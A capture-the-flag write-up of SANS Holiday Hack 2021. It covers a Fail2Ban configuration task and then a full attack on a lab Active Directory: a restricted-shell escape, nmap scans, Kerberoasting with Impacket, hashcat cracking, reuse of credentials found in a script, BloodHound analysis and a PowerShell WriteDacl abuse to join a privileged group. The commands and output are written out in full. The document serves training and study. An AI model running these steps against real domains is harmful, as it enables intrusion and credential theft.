Holiday Hack 2021: Kerberoasting on an Open Fire
Objective
Terminal - HoHo … No
Challenge
Even Snowshoes is waiting in Santa’s office with the HoHo…No terminal:
Hey there, how’s it going? I’m Eve Snowshoes.
Lately I’ve been spending a lot of cycles worrying about what’s going on next door.
Before that, I was checking out Fail2Ban.
It’s this slick log scanning tool for Apache web servers.
If you can complete this terminal challenge, I’d be happy to give you some things I’ve learned about Kerberoasting and Active Directory permissions!
Why don’t you do some work with Fail2Ban on this Cranberry Pi terminal first, then we’ll talk Kerberoasting and Active Directory. OK?
The terminal header is all about Fail2Ban:
Fail2Ban is designed to parse logs and have certain actions taken when a given log associated with a given IP happens too many times in a defined period. For example, if there are more than 5 failed SSH logins from the same IP in 2 minutes, block that IP for one hour in IP tables.
This challenges asks that I parse a custom log, looking for 10 or more failures in an hour, and pass those to /root/naughtlylist.
Solution
The full solution for this challenge is in this video:
Identify Malicious Logs
Using greg to look at the log, I identified four different types of malicious logs:
-
Failed login:
2022-01-03 22:10:22 Failed login from 101.103.18.26 for alabaster -
Rejected:
2022-01-03 22:10:29 Login from 20.252.236.61 rejected due to unknown user name -
Invalid:
2022-01-03 22:10:30 Invalid heartbeat 'delta' from 68.175.124.205 -
Malformed:
2022-01-03 22:10:33 101.103.18.26 sent a malformed request
Configure Fail2Ban
Andy Smith gave a talk at this years KringleCon on Fail2Ban, and it’s a good walkthrough of how to configure it. I’ll need to create three files.
I’ll start with a filter, /etc/fail2ban/filter.d/df.conf :
[Definition]
failregex = Failed login from <HOST> for .+$
Login from <HOST> rejected due to unknown user name$
Invalid heartbeat '.+' from <HOST>$
<HOST> sent a malformed request$
The four lines are the four options for matching in the log data. I can test the filter with fail2ban-regex (shown in the video).
Next, I need an action, which defines what happens when there’s a block. /etc/fail2ban/action.d/df.conf:
[Definition]
actionban = /root/naughtylist add <ip>
actionunban = /root/naughtylist del <ip>
Finally, to tie them together, a jail file that describes how they interact, /etc/fail2ban/jail.d/df.conf:
[df]
enabled = true
logpath = /var/log/hohono.log
findtime = 60m
maxretry = 10
filter = df
action = df
Run It
To put these in place, I’ll restart the Fail2Ban service (service fail2ban restart), and then I’ll run /root/naughtlylist refresh to replay the logs and solve the challenge.
Kerberoasting on an Open Fire
Hints
Eve has gratitude and hints to offer:
Fantastic! Thanks for the help!
Hey, would you like to know more about Kerberoasting and Active Directory permissions abuse?
There’s a great talk by Chris Davis on this exact subject!
There are also plenty of resources available to learn more about Kerberoasting specifically.
If you have any trouble finding the domain controller on the
10.X.X.Xnetwork, remember that, when not running as root,nmapdefault probing relies on connecting to TCP 80 and 443.Got a hash that won’t crack with your wordlist? OneRuleToRuleThemAll.rule is a great way to grow your keyspace.
Where’d you get your wordlist? CeWL might generate a great wordlist from the ElfU website, but it will ignore digits in terms by default.
So, apropos of nothing, have you ever known system administrators who store credentials in scripts? I know, I know, you understand the folly and would never do it!
The easy way to investigate Active Directory misconfigurations (for Blue and Red alike!) is with Bloodhound, but there are native methods as well.
Oh, and one last thing: once you’ve granted permissions to your user, it might take up to five minutes for it to propagate throughout the domain.
A record seven more hints unlock in my badge:
- Check out Chris Davis’ talk and scripts on Kerberoasting and Active Directory permissions abuse.
- Learn about Kerberoasting to leverage domain credentials to get usernames and crackable hashes for service accounts.
- There will be some
10.X.X.Xnetworks in your routing tables that may be interesting. Also, consider adding-PS22,445to yournmapscans to “fix” default probing for unprivileged scans. - OneRuleToRuleThemAll.rule is great for mangling when a password dictionary isn’t enough.
- CeWL can generate some great wordlists from website, but it will ignore digits in terms by default.
- Administrators often store credentials in scripts. These can be coopted by an attacker for other purposes!
- Investigating Active Directory errors is harder without Bloodhound, but there are native methods.
Solution
There’s a full walkthrough of solving this challenge in this video:
A summary of the steps follows here as well.
Get Creds
Visiting the page redirects to /register, which has a registration form.
On submitting data, I’m giving a username and credentials to the grading server:
Escape the Limited Shell
When I connect, I’m in some kind of custom shell:
===================================================
= Elf University Student Grades Portal =
= (Reverts Everyday 12am EST) =
===================================================
1. Print Current Courses/Grades.
e. Exit
:
Entering 1:
0 Shortname Description Grade
==================================================
1 WHOL101 World Holiday Literature F
2 NPAR301 North Pole Art Appreciation D+
3 REIH201 Reindeer Husbandry F
4 GEOG101 Geometry of Gift-Wrapping B-
5 SLPE101 Sleigh Propulsion Engineering C+
Press Enter to continue...
Anything else clears and reprints menu, except e, which exits closing the SSH connection.
Ctrl-z and Ctrl-c both print:
You may only type 'exit' to leave the exam
Ctrl-d however drops to a Python terminal:
===================================================
= Elf University Student Grades Portal =
= (Reverts Everyday 12am EST) =
===================================================
1. Print Current Courses/Grades.
e. Exit
: Traceback (most recent call last):
File "/opt/grading_system", line 41, in <module>
main()
File "/opt/grading_system", line 26, in main
a = input(": ").lower().strip()
EOFError
>>>
And I can drop to a bash shell:
>>> os.system("bash")
rncztspfgz@grades:~$
I can also update my users shell from the grading program to bash with chsh.
Find Servers
This host’s IP is in the 172.17.0.0/24 subnet. Looking at the routing tables (as suggested by the hints), there are three 10.128.X.0/24 networks:
rncztspfgz@grades:~$ ip route
default via 172.17.0.1 dev eth0
10.128.1.0/24 via 172.17.0.1 dev eth0
10.128.2.0/24 via 172.17.0.1 dev eth0
10.128.3.0/24 via 172.17.0.1 dev eth0
172.17.0.0/16 dev eth0 proto kernel scope link src 172.17.0.2
nmap scanning will identify a bunch of hosts, but the two most of interest are DC01 and SHARE30, both on the elfu.local domain:
rncztspfgz@grades:~$ nmap -Pn -sCV 10.128.1.53
Starting Nmap 7.80 ( https://nmap.org ) at 2022-01-07 18:09 UTC
Nmap scan report for hhc21-windows-dc.c.holidayhack2021.internal (10.128.1.53)
Host is up (0.00057s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-01-07 18:09:13Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: elfu.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: elfu.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: ELFU
| NetBIOS_Domain_Name: ELFU
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: elfu.local
| DNS_Computer_Name: DC01.elfu.local
| DNS_Tree_Name: elfu.local
| Product_Version: 10.0.17763
|_ System_Time: 2022-01-07T18:11:29+00:00
| ssl-cert: Subject: commonName=DC01.elfu.local
| Not valid before: 2021-10-28T19:21:37
|_Not valid after: 2022-04-29T19:21:37
|_ssl-date: 2022-01-07T18:12:09+00:00; 0s from scanner time.
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=1/7%Time=61D881CE%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-01-07T18:11:32
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 254.17 seconds
rncztspfgz@grades:~$ nmap -PS22,445 -sCV 10.128.3.30
Starting Nmap 7.80 ( https://nmap.org ) at 2022-01-07 18:37 UTC
Nmap scan report for 10.128.3.30
Host is up (0.00027s latency).
Not shown: 966 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 ce:7e:b4:4b:bc:b9:39:6f:10:d8:3f:f4:3f:6a:06:ef (RSA)
| 256 eb:a9:4b:ec:04:c0:7a:0e:a3:36:f7:4b:49:d7:de:bf (ECDSA)
|_ 256 c1:a9:ac:ad:69:13:b7:b1:23:c7:d4:cc:8f:32:1e:b0 (ED25519)
53/tcp open domain (generic dns response: NOTIMP)
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Werkzeug httpd 2.0.2 (Python 3.8.10)
|_http-server-header: Werkzeug/2.0.2 Python/3.8.10
| http-title: Site doesn't have a title (text/html; charset=utf-8).
|_Requested resource was http://10.128.3.30/register
88/tcp open kerberos-sec Heimdal Kerberos (server time: 2022-01-07 18:37:11Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: ELFU)
389/tcp open ldap (Anonymous bind OK)
| ssl-cert: Subject: commonName=SHARE30.elfu.local/organizationName=Samba Administration
| Not valid before: 2021-10-29T19:30:08
|_Not valid after: 2023-09-29T19:30:08
|_ssl-date: 2022-01-07T18:37:25+00:00; -42s from scanner time.
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: ELFU)
464/tcp open kpasswd5?
636/tcp open ssl/ldap (Anonymous bind OK)
| ssl-cert: Subject: commonName=SHARE30.elfu.local/organizationName=Samba Administration
| Not valid before: 2021-10-29T19:30:08
|_Not valid after: 2023-09-29T19:30:08
|_ssl-date: 2022-01-07T18:37:51+00:00; -16s from scanner time.
1024/tcp open msrpc Microsoft Windows RPC
...[snip]...
1044/tcp open tcpwrapped
2222/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
3268/tcp open ldap (Anonymous bind OK)
| ssl-cert: Subject: commonName=SHARE30.elfu.local/organizationName=Samba Administration
| Not valid before: 2021-10-29T19:30:08
|_Not valid after: 2023-09-29T19:30:08
|_ssl-date: 2022-01-07T18:38:36+00:00; +29s from scanner time.
3269/tcp open ssl/ldap (Anonymous bind OK)
| ssl-cert: Subject: commonName=SHARE30.elfu.local/organizationName=Samba Administration
| Not valid before: 2021-10-29T19:30:08
|_Not valid after: 2023-09-29T19:30:08
|_ssl-date: 2022-01-07T18:37:00+00:00; -1m07s from scanner time.
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=1/7%Time=61D8885C%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,2B,"\0\)\0\x06\x81\x80\0\x01\0\0\0\0\0\x01\x07version\x
SF:04bind\0\0\x10\0\x03\0\0\)\x02\0\0\0\0\0\0\0")%r(DNSStatusRequestTCP,E,
SF:"\0\x0c\0\0\x90\x04\0\0\0\0\0\0\0\0");
Service Info: Host: SHARE30; OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -13s, deviation: 31s, median: 0s
|_nbstat: NetBIOS name: SHARE30, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: share30
| NetBIOS computer name: SHARE30\x00
| Domain name: elfu.local
| FQDN: share30.elfu.local
|_ System time: 2022-01-07T18:37:59+00:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-01-07T18:37:59
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.92 seconds
SHARE30 has two interesting shares:
rncztspfgz@grades:~$ smbclient -L //10.128.3.30
Enter WORKGROUP\rncztspfgz's password:
Sharename Type Comment
--------- ---- -------
netlogon Disk
sysvol Disk
elfu_svc_shr Disk elfu_svc_shr
research_dep Disk research_dep
IPC$ IPC IPC Service (Samba 4.3.11-Ubuntu)
SMB1 disabled -- no workgroup available
research_dep seems like where I’m probably trying to get eventually.
elfu_svc via Kerberoast
Because I have a domain user, I can find any kerberoastable accounts from the DC using the Impacket script that is conveniently installed on the grading server:
rncztspfgz@grades:~$ GetUserSPNs.py -request -dc-ip 10.128.1.53 elfu.local/rncztspfgz:'Iylbegxmf#'
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
----------------------------------- -------- -------- -------------------------- --------- ----------
ldap/elfu_svc/elfu elfu_svc 2021-10-29 19:25:04.305279 <never>
ldap/elfu_svc/elfu.local elfu_svc 2021-10-29 19:25:04.305279 <never>
ldap/elfu_svc.elfu.local/elfu elfu_svc 2021-10-29 19:25:04.305279 <never>
ldap/elfu_svc.elfu.local/elfu.local elfu_svc 2021-10-29 19:25:04.305279 <never>
$krb5tgs$23$*elfu_svc$ELFU.LOCAL$elfu.local/elfu_svc*$da9854fa969fcfcd7ca524745b0d8bcf$5ad62e78b2fc539722b7c7d97e84dc0d06d585db187316f98eb3c0688b93100dc9eb42a76af01d9340e3a4d527a011c421b22eeda687092d06fe0a44a6b84572abf982acc90e8eefffd31549543dc883af910f2a78da903f231f488028a537179560d3522ad116da25589d9d28e08b5f7f2575
20b4775f09f0e20484b7757250f8f4616748fb1aa0abb7c12c45c4f58ffb5d2162506daebcd651a2d637eff520b974d8021ea5cd5a9d4648ff204f528149bbf7905223b6cb2eeea84ee8e1159da8918bbb33d679d318b4d8fbaebb70b57538a5126217acd70934317d2dea4e27c45fa4089326e11deb13fe2bbd4134f725ffc141040893dc27413feb4e2d4a4f713f669d4aadb50795d0d65380febfce00b
bdc0ab1e119e7a1710035e2081628d7b85be3773e20439741f23c6bc6ce6115f89b4250459b12f70c76e3c7dff17f9de68d36aef4b8ab96da1d0453d523374309c315db2e115e6365400eac57b1f61c8db785354bf906f86322a9c52d32d36ac8ae1df306a51be5a06a70b06bcfda767515be9f2bb7636354d0e0474dba0662ea641c108c0cd3825c9dda78df919cd21cd432684110f0335118d42272fb2a
97b76d5dac062ab7732a159b5b2893fe9e9957b7e1a93b11b32ebded0c8d94f2666454ce515518e7f442b9348f40259e54bd1d385c3206076ba410e7426f50067ce0150e9395ea7e1b5345b998be8d3274e941111346c87b94960ff79360d5feebcce8cb90850682b30d2c054847daac86409d126d418ce37217870c7d4925790fb64f7eb1fa1af2e6d773d535c7a7900eb15dba4f1014a88957d9914ff04
b86c2d9636928126983c1fcfa351f7ec2e996682c662c0f40854b1f96d5900179bfa4d703e82d7d3064375c9676d62717b8dd28a10df4e42c9fa8695441d11f4ec16642f69fced598720d5ea2a66e0a85eb02c72a9cfe778ffbd7ed23597a5e16e45c176e395a035122e08c926f7dc19ac8810e9f664ced36f34f5dda2af81fcabdb0b73fb7c00eea782efc03798b815748c93e2a7bda911ed39ec20df3b5
92190efa9c92cf98f2555749b0e442020661cc5858cddbc32102aa4c91cb198b4bd7eaa779e79bf85f88f8eb59d3beff250f3cd94ac1dacab92a127d337d67d127e673386ca3d5b807c1a9b44e5e039b04e3daaf02fecfc62d1b2e76ce25ab9b263054645eb2eeb7e4551a4a07924132a8288e2ac2bf0237b570722bca9b262b6db812dd2eca92a9b46340ea14bf1b4a0a0c9b004ffcc92853451556f6c3a
97b792fe3279b63d4283dab83554a6d5174ed800e767b6bc53fe393e88d963497811d08e859be078dd9c073a680fe98193edb75c9fccdbc778d76355faea27c95dc997de855e8bccadeab6d25dfdab5496f0e5fbc795815b625a8c7b0f74e428e64cf4cf13b5e90f87d3ffd8d0d4ab01e660087127b53486574
It returns a hash for the elfu_svc account, which matches the share name from SHARE30.
Based on the hints, I’ll generate a wordlist from the elfu website using cewl:
$ /opt/CeWL/cewl.rb --with-numbers https://register.elfu.org/register > wordlist
I’ll use the wordlist plus the hash and the rule suggested in the hints to crack the hash with Hashcat:
$ hashcat -m 13100 -r OneRule.rule hash wordlist
...[snip]...
The password is “Snow2021!”.
remote_elf
I can’t access the DC or the research share, but I can access the elfu_svc_shr:
rncztspfgz@grades:~$ smbclient //10.128.3.30/elfu_svc_shr -U elfu.local\\elfu_svc
Enter ELFU.LOCAL\elfu_svc's password:
Try "help" to get a list of possible commands.
smb: \>
The share has 160 PowerShell scripts in it. I’ll download them all, and do some grep to look for things of interest. When I look for elfu, I get a hit:
rncztspfgz@grades:~/scripts$ grep -i elfu *
GetProcessInfo.ps1:$aCred = New-Object System.Management.Automation.PSCredential -ArgumentList ("elfu.local\remote_elf", $aPass)
Not only is that a hit, but the script is creating a credential object. The script is just running the Get-Process command on the DC as remote_elf:
$SecStringPassword = "76492d1116743f0423413b16050a5345MgB8AGcAcQBmAEIAMgBiAHUAMwA5AGIAbQBuAGwAdQAwAEIATgAwAEoAWQBuAGcAPQA9AHwANgA5ADgAMQA1ADIANABmAGIAMAA1AGQAOQA0AGMANQBlADYAZAA2ADEAMgA3AGIANwAxAGUAZgA2AGYAOQBiAGYAMwBjADEAYwA5AGQANABlAGMAZAA1ADUAZAAxADUANwAxADMAYwA0ADUAMwAwAGQANQA5ADEAYQBlADYAZAAzADUAMAA3AGIAYwA2AGEANQAxADAAZAA2ADcANwBlAGUAZQBlADcAMABjAGUANQAxADEANgA5ADQANwA2AGEA"
$aPass = $SecStringPassword | ConvertTo-SecureString -Key 2,3,1,6,2,8,9,9,4,3,4,5,6,8,7,7
$aCred = New-Object System.Management.Automation.PSCredential -ArgumentList ("elfu.local\remote_elf", $aPass)
Invoke-Command -ComputerName 10.128.1.53 -ScriptBlock { Get-Process } -Credential $aCred -Authentication Negotiate
I’ll use these creds to get a PS session on the DC as remote_elf:
PS /home/rncztspfgz/scripts> $SecStringPassword = "76492d1116743f0423413b16050a5345MgB8AGcAcQBmAEIAMgBiAHUAMwA5AGIAbQBuAGwAdQAwAEIATgAwAEoAWQBuAGcAPQA9AHwANgA5ADgAMQA1ADIANABmAGIAMAA1AGQAOQA0AGMANQBlADYAZAA2ADEAMgA3AGIANwAxAGUAZgA2AGYAOQBiAGYAMwBjADEAYwA5AGQANABlAGMAZAA1ADUAZAAxADUANwAxADMAYwA0ADUAMwAwAGQANQA5ADEAYQ
BlADYAZAAzADUAMAA3AGIAYwA2AGEANQAxADAAZAA2ADcANwBlAGUAZQBlADcAMABjAGUANQAxADEANgA5ADQANwA2AGEA"
PS /home/rncztspfgz/scripts> $aPass = $SecStringPassword | ConvertTo-SecureString -Key 2,3,1,6,2,8,9,9,4,3,4,5,6,8,7,7
PS /home/rncztspfgz/scripts> $aCred = New-Object System.Management.Automation.PSCredential -ArgumentList ("elfu.local\remote_elf", $aPass)
PS /home/rncztspfgz/scripts> Enter-PSSession -ComputerName 10.128.1.53 -Credential $aCred -Authentication Negotiate
[10.128.1.53]: PS C:\Users\remote_elf\Documents>
Bloodhound
Now with three domain users owned, I’ll take a look at what they can control (I actually ran this towards the beginning, but now is when it’s time to look).
I can’t get files to/from the DC, but I can use bloodhound.py from the grading server (after using scp to get it there):
rncztspfgz@grades:~/bh$ python3 ../BloodHound.py/bloodhound.py -c all -u elfu_svc -d elfu.local -p 'Snow2021!' -dc dc01.elfu.local
INFO: Found AD domain: elfu.local
INFO: Connecting to LDAP server: dc01.elfu.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 238 computers
INFO: Connecting to LDAP server: dc01.elfu.local
INFO: Found 246 users
INFO: Found 54 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.elfu.local
INFO: Querying computer: share30.elfu.local
INFO: Skipping enumeration for share30.elfu.local since it could not be resolved.
INFO: Done in 00M 01S
I’ll scp the resulting files back to my host, and open them in BloodHound. After marking each of the users I control as owned, I’ll loook at the “First Degree Object Control” for each. remote_elf has a really interesting one:
Access Research Department Share
With WriteDacl on the Researchdepartment group, I can add users to it. PowerView makes this easy, but since I can’t get files to the DC, I can use the scripts from Chris Davis’ gist. The first set of commands runs as remote_elf to give GenericAll to my user over the group:
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> Add-Type -AssemblyName System.DirectoryServices
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $ldapConnString = "LDAP://CN=Research Department,CN=Users,DC=elfu,DC=local"
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $username = "rncztspfgz"
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $nullGUID = [guid]'00000000-0000-0000-0000-000000000000'
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $propGUID = [guid]'00000000-0000-0000-0000-000000000000'
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $IdentityReference = (New-Object System.Security.Principal.NTAccount("elfu.local\$username")).Translate([System.Security.Principal.SecurityIdentifier])
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $inheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance]::None
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $ACE = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $IdentityReference, ([System.DirectoryServices.ActiveDirectoryRights] "GenericAll"), ([System.Security.AccessControl.AccessControlType] "Allow"), $propGUID, $inheritanceType, $nullGUID
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $domainDirEntry = New-Object System.DirectoryServices.DirectoryEntry $ldapConnString
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $secOptions = $domainDirEntry.get_Options()
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $secOptions.SecurityMasks = [System.DirectoryServices.SecurityMasks]::Dacl
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $domainDirEntry.RefreshCache()
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $domainDirEntry.get_ObjectSecurity().AddAccessRule($ACE)
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $domainDirEntry.CommitChanges()
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $domainDirEntry.dispose()
Next, I’ll use that new power to add myself to the group:
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> Add-Type -AssemblyName System.DirectoryServices
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $ldapConnString = "LDAP://CN=Research Department,CN=Users,DC=elfu,DC=local"
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $username = "rncztspfgz"
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $password = "Iylbegxmf#"
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $domainDirEntry = New-Object System.DirectoryServices.DirectoryEntry $ldapConnString, $username, $password
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $user = New-Object System.Security.Principal.NTAccount("elfu.local\$username")
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $sid=$user.Translate([System.Security.Principal.SecurityIdentifier])
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $b=New-Object byte[] $sid.BinaryLength
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $sid.GetBinaryForm($b,0)
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $hexSID=[BitConverter]::ToString($b).Replace('-','')
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $domainDirEntry.Add("LDAP://<SID=$hexSID>")
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $domainDirEntry.CommitChanges()
[dc01.elfu.local]: PS C:\Users\remote_elf\Documents> $domainDirEntry.dispose()
Once that propagates (can take up to five minutes), I can connect to the share on SHARE30:
rncztspfgz@grades:~/bh$ smbclient //10.128.3.30/research_dep Iylbegxmf#
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Dec 2 16:39:42 2021
.. D 0 Fri Jan 7 08:01:37 2022
SantaSecretToAWonderfulHolidaySeason.pdf N 173932 Thu Dec 2 16:38:26 2021
41089256 blocks of size 1024. 34736208 blocks available
In that PDF, I’ll find the flag:
Flag: Kindness